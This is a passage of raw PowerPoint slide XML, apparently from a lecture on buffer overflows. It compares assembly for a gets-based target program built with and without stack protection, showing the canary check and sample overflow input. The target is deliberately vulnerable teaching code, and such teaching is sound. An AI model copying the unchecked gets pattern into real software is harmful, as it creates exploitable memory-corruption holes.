          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273629" y="1212898"/>
            <a:ext cx="4668909" cy="564510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$.LC1,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leaq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="162AFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    8(%</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$.LC2,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$0, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf</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leaq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="162AFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    8(%</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gets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leaq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="162AFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    8(%</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ret</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03FC1476-1F63-034D-B5C5-082379182992}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6684893" y="1212898"/>
            <a:ext cx="4680857" cy="564510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xorl</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endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC0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$.LC1,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$.LC2,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$0, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf</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gets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jne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     .L6</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ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.L6:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    call    __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stack_chk_fail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{242F89EC-D6C5-314F-86B1-D860DF4CE2AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1086431" y="880807"/>
            <a:ext cx="5043304"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-stack-protector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -S has-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2F05FEB-FDDD-D941-ADEC-062BC6CC7CCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6662270" y="880807"/>
            <a:ext cx="4726101"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-protector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -S has-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rounded Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23E3BFF8-0F80-C24A-A01B-FB392A43EC95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="673857" y="2677324"/>
            <a:ext cx="4305301" cy="1547312"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4305301"/>
              <a:gd name="connsiteY0" fmla="*/ 257890 h 1547312"/>
              <a:gd name="connsiteX1" fmla="*/ 257890 w 4305301"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1547312"/>
              <a:gd name="connsiteX2" fmla="*/ 799250 w 4305301"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1547312"/>
              <a:gd name="connsiteX3" fmla="*/ 1264820 w 4305301"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1547312"/>
              <a:gd name="connsiteX4" fmla="*/ 1844075 w 4305301"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1547312"/>
              <a:gd name="connsiteX5" fmla="*/ 2309645 w 4305301"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 1547312"/>
              <a:gd name="connsiteX6" fmla="*/ 2888900 w 4305301"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 1547312"/>
              <a:gd name="connsiteX7" fmla="*/ 3316575 w 4305301"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 1547312"/>
              <a:gd name="connsiteX8" fmla="*/ 4047411 w 4305301"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 1547312"/>
              <a:gd name="connsiteX9" fmla="*/ 4305301 w 4305301"/>
              <a:gd name="connsiteY9" fmla="*/ 257890 h 1547312"/>
              <a:gd name="connsiteX10" fmla="*/ 4305301 w 4305301"/>
              <a:gd name="connsiteY10" fmla="*/ 773656 h 1547312"/>
              <a:gd name="connsiteX11" fmla="*/ 4305301 w 4305301"/>
              <a:gd name="connsiteY11" fmla="*/ 1289422 h 1547312"/>
              <a:gd name="connsiteX12" fmla="*/ 4047411 w 4305301"/>
              <a:gd name="connsiteY12" fmla="*/ 1547312 h 1547312"/>
              <a:gd name="connsiteX13" fmla="*/ 3581841 w 4305301"/>
              <a:gd name="connsiteY13" fmla="*/ 1547312 h 1547312"/>
              <a:gd name="connsiteX14" fmla="*/ 3078376 w 4305301"/>
              <a:gd name="connsiteY14" fmla="*/ 1547312 h 1547312"/>
              <a:gd name="connsiteX15" fmla="*/ 2537016 w 4305301"/>
              <a:gd name="connsiteY15" fmla="*/ 1547312 h 1547312"/>
              <a:gd name="connsiteX16" fmla="*/ 2071446 w 4305301"/>
              <a:gd name="connsiteY16" fmla="*/ 1547312 h 1547312"/>
              <a:gd name="connsiteX17" fmla="*/ 1454296 w 4305301"/>
              <a:gd name="connsiteY17" fmla="*/ 1547312 h 1547312"/>
              <a:gd name="connsiteX18" fmla="*/ 912936 w 4305301"/>
              <a:gd name="connsiteY18" fmla="*/ 1547312 h 1547312"/>
              <a:gd name="connsiteX19" fmla="*/ 257890 w 4305301"/>
              <a:gd name="connsiteY19" fmla="*/ 1547312 h 1547312"/>
              <a:gd name="connsiteX20" fmla="*/ 0 w 4305301"/>
              <a:gd name="connsiteY20" fmla="*/ 1289422 h 1547312"/>
              <a:gd name="connsiteX21" fmla="*/ 0 w 4305301"/>
              <a:gd name="connsiteY21" fmla="*/ 753025 h 1547312"/>
              <a:gd name="connsiteX22" fmla="*/ 0 w 4305301"/>
              <a:gd name="connsiteY22" fmla="*/ 257890 h 154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05301" h="1547312" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="257890"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="-32676" y="113612"/>
                  <a:pt x="126661" y="9642"/>
                  <a:pt x="257890" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="508756" y="-2716"/>
                  <a:pt x="643771" y="13235"/>
                  <a:pt x="799250" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="954729" y="-13235"/>
                  <a:pt x="1134087" y="6197"/>
                  <a:pt x="1264820" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1395553" y="-6197"/>
                  <a:pt x="1680274" y="46210"/>
                  <a:pt x="1844075" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2007876" y="-46210"/>
                  <a:pt x="2179906" y="14923"/>
                  <a:pt x="2309645" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2439384" y="-14923"/>
                  <a:pt x="2643678" y="25317"/>
                  <a:pt x="2888900" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3134122" y="-25317"/>
                  <a:pt x="3156565" y="35806"/>
                  <a:pt x="3316575" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3476585" y="-35806"/>
                  <a:pt x="3690727" y="76215"/>
                  <a:pt x="4047411" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4220090" y="28051"/>
                  <a:pt x="4327104" y="102425"/>
                  <a:pt x="4305301" y="257890"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4332514" y="399112"/>
                  <a:pt x="4288631" y="666486"/>
                  <a:pt x="4305301" y="773656"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4321971" y="880826"/>
                  <a:pt x="4257981" y="1063925"/>
                  <a:pt x="4305301" y="1289422"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4317039" y="1428744"/>
                  <a:pt x="4187844" y="1561137"/>
                  <a:pt x="4047411" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3884815" y="1557869"/>
                  <a:pt x="3694897" y="1547172"/>
                  <a:pt x="3581841" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3468785" y="1547452"/>
                  <a:pt x="3281125" y="1541791"/>
                  <a:pt x="3078376" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2875627" y="1552833"/>
                  <a:pt x="2722103" y="1538533"/>
                  <a:pt x="2537016" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2351929" y="1556091"/>
                  <a:pt x="2302387" y="1538028"/>
                  <a:pt x="2071446" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1840505" y="1556596"/>
                  <a:pt x="1665278" y="1485379"/>
                  <a:pt x="1454296" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1243314" y="1609245"/>
                  <a:pt x="1099779" y="1524954"/>
                  <a:pt x="912936" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="726093" y="1569670"/>
                  <a:pt x="531400" y="1469352"/>
                  <a:pt x="257890" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108847" y="1539745"/>
                  <a:pt x="8788" y="1422343"/>
                  <a:pt x="0" y="1289422"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-37081" y="1058877"/>
                  <a:pt x="62346" y="900996"/>
                  <a:pt x="0" y="753025"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-62346" y="605054"/>
                  <a:pt x="16870" y="409319"/>
                  <a:pt x="0" y="257890"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="4305301" h="1547312" stroke="0" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="257890"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="-9077" y="109862"/>
                  <a:pt x="78820" y="13752"/>
                  <a:pt x="257890" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="408756" y="-2462"/>
                  <a:pt x="575190" y="51679"/>
                  <a:pt x="875041" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1174892" y="-51679"/>
                  <a:pt x="1156619" y="28381"/>
                  <a:pt x="1378505" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1600391" y="-28381"/>
                  <a:pt x="1686031" y="44446"/>
                  <a:pt x="1844075" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2002119" y="-44446"/>
                  <a:pt x="2239246" y="19348"/>
                  <a:pt x="2423331" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2607416" y="-19348"/>
                  <a:pt x="2763284" y="24083"/>
                  <a:pt x="2926796" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3090309" y="-24083"/>
                  <a:pt x="3380294" y="19349"/>
                  <a:pt x="3543946" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3707598" y="-19349"/>
                  <a:pt x="3917947" y="10587"/>
                  <a:pt x="4047411" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4168513" y="35281"/>
                  <a:pt x="4296480" y="105230"/>
                  <a:pt x="4305301" y="257890"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4321575" y="411851"/>
                  <a:pt x="4292472" y="605132"/>
                  <a:pt x="4305301" y="753025"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4318130" y="900918"/>
                  <a:pt x="4300093" y="1159987"/>
                  <a:pt x="4305301" y="1289422"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4333778" y="1403711"/>
                  <a:pt x="4198403" y="1541791"/>
                  <a:pt x="4047411" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3883693" y="1585487"/>
                  <a:pt x="3624651" y="1494788"/>
                  <a:pt x="3506051" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3387451" y="1599836"/>
                  <a:pt x="3251317" y="1518011"/>
                  <a:pt x="3040481" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2829645" y="1576613"/>
                  <a:pt x="2643749" y="1491091"/>
                  <a:pt x="2499121" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2354493" y="1603533"/>
                  <a:pt x="2139180" y="1513730"/>
                  <a:pt x="1881970" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1624760" y="1580894"/>
                  <a:pt x="1520539" y="1538318"/>
                  <a:pt x="1340610" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1160681" y="1556306"/>
                  <a:pt x="1077023" y="1523899"/>
                  <a:pt x="912936" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="748849" y="1570725"/>
                  <a:pt x="408441" y="1474855"/>
                  <a:pt x="257890" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="149840" y="1526919"/>
                  <a:pt x="-14148" y="1454312"/>
                  <a:pt x="0" y="1289422"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-53521" y="1183709"/>
                  <a:pt x="23561" y="978064"/>
                  <a:pt x="0" y="783971"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-23561" y="589878"/>
                  <a:pt x="24803" y="408233"/>
                  <a:pt x="0" y="257890"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="38100">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0x7fffdf3020a8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>abcdefghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>abcdefghi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4" name="Rounded Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D8659BA-3618-9844-B401-95CF01317307}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5256737" y="2677324"/>
            <a:ext cx="6935263" cy="1985366"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6935263"/>
              <a:gd name="connsiteY0" fmla="*/ 330901 h 1985366"/>
              <a:gd name="connsiteX1" fmla="*/ 330901 w 6935263"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX2" fmla="*/ 775746 w 6935263"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX3" fmla="*/ 1157857 w 6935263"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX4" fmla="*/ 1602703 w 6935263"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX5" fmla="*/ 2110283 w 6935263"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX6" fmla="*/ 2680597 w 6935263"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX7" fmla="*/ 3125443 w 6935263"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX8" fmla="*/ 3821227 w 6935263"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX9" fmla="*/ 4391541 w 6935263"/>
              <a:gd name="connsiteY9" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX10" fmla="*/ 5087325 w 6935263"/>
              <a:gd name="connsiteY10" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX11" fmla="*/ 5720374 w 6935263"/>
              <a:gd name="connsiteY11" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX12" fmla="*/ 6604362 w 6935263"/>
              <a:gd name="connsiteY12" fmla="*/ 0 h 1985366"/>
              <a:gd name="connsiteX13" fmla="*/ 6935263 w 6935263"/>
              <a:gd name="connsiteY13" fmla="*/ 330901 h 1985366"/>
              <a:gd name="connsiteX14" fmla="*/ 6935263 w 6935263"/>
              <a:gd name="connsiteY14" fmla="*/ 758853 h 1985366"/>
              <a:gd name="connsiteX15" fmla="*/ 6935263 w 6935263"/>
              <a:gd name="connsiteY15" fmla="*/ 1160334 h 1985366"/>
              <a:gd name="connsiteX16" fmla="*/ 6935263 w 6935263"/>
              <a:gd name="connsiteY16" fmla="*/ 1654465 h 1985366"/>
              <a:gd name="connsiteX17" fmla="*/ 6604362 w 6935263"/>
              <a:gd name="connsiteY17" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX18" fmla="*/ 5908578 w 6935263"/>
              <a:gd name="connsiteY18" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX19" fmla="*/ 5463733 w 6935263"/>
              <a:gd name="connsiteY19" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX20" fmla="*/ 4893418 w 6935263"/>
              <a:gd name="connsiteY20" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX21" fmla="*/ 4260369 w 6935263"/>
              <a:gd name="connsiteY21" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX22" fmla="*/ 3564585 w 6935263"/>
              <a:gd name="connsiteY22" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX23" fmla="*/ 2931536 w 6935263"/>
              <a:gd name="connsiteY23" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX24" fmla="*/ 2235752 w 6935263"/>
              <a:gd name="connsiteY24" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX25" fmla="*/ 1602703 w 6935263"/>
              <a:gd name="connsiteY25" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX26" fmla="*/ 1157857 w 6935263"/>
              <a:gd name="connsiteY26" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX27" fmla="*/ 330901 w 6935263"/>
              <a:gd name="connsiteY27" fmla="*/ 1985366 h 1985366"/>
              <a:gd name="connsiteX28" fmla="*/ 0 w 6935263"/>
              <a:gd name="connsiteY28" fmla="*/ 1654465 h 1985366"/>
              <a:gd name="connsiteX29" fmla="*/ 0 w 6935263"/>
              <a:gd name="connsiteY29" fmla="*/ 1200041 h 1985366"/>
              <a:gd name="connsiteX30" fmla="*/ 0 w 6935263"/>
              <a:gd name="connsiteY30" fmla="*/ 785325 h 1985366"/>
              <a:gd name="connsiteX31" fmla="*/ 0 w 6935263"/>
              <a:gd name="connsiteY31" fmla="*/ 330901 h 198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35263" h="1985366" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="330901"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3476" y="132976"/>
                  <a:pt x="131627" y="-532"/>
                  <a:pt x="330901" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="464491" y="-46664"/>
                  <a:pt x="608229" y="48684"/>
                  <a:pt x="775746" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="943264" y="-48684"/>
                  <a:pt x="1020233" y="31838"/>
                  <a:pt x="1157857" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1295481" y="-31838"/>
                  <a:pt x="1393496" y="14476"/>
                  <a:pt x="1602703" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1811910" y="-14476"/>
                  <a:pt x="1992314" y="48941"/>
                  <a:pt x="2110283" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2228252" y="-48941"/>
                  <a:pt x="2499887" y="50706"/>
                  <a:pt x="2680597" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2861307" y="-50706"/>
                  <a:pt x="2929604" y="49464"/>
                  <a:pt x="3125443" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3321282" y="-49464"/>
                  <a:pt x="3531058" y="24405"/>
                  <a:pt x="3821227" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4111396" y="-24405"/>
                  <a:pt x="4215765" y="15266"/>
                  <a:pt x="4391541" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4567317" y="-15266"/>
                  <a:pt x="4896808" y="24543"/>
                  <a:pt x="5087325" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5277842" y="-24543"/>
                  <a:pt x="5441526" y="27639"/>
                  <a:pt x="5720374" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5999222" y="-27639"/>
                  <a:pt x="6377898" y="27360"/>
                  <a:pt x="6604362" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6811769" y="4227"/>
                  <a:pt x="6903459" y="159785"/>
                  <a:pt x="6935263" y="330901"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6947249" y="469426"/>
                  <a:pt x="6929529" y="637266"/>
                  <a:pt x="6935263" y="758853"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6940997" y="880440"/>
                  <a:pt x="6888838" y="1042861"/>
                  <a:pt x="6935263" y="1160334"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6981688" y="1277807"/>
                  <a:pt x="6920201" y="1462150"/>
                  <a:pt x="6935263" y="1654465"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6946448" y="1797930"/>
                  <a:pt x="6769918" y="1954799"/>
                  <a:pt x="6604362" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6355689" y="2034516"/>
                  <a:pt x="6141624" y="1982336"/>
                  <a:pt x="5908578" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5675532" y="1988396"/>
                  <a:pt x="5585775" y="1961469"/>
                  <a:pt x="5463733" y="1985366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5341691" y="2009263"/>
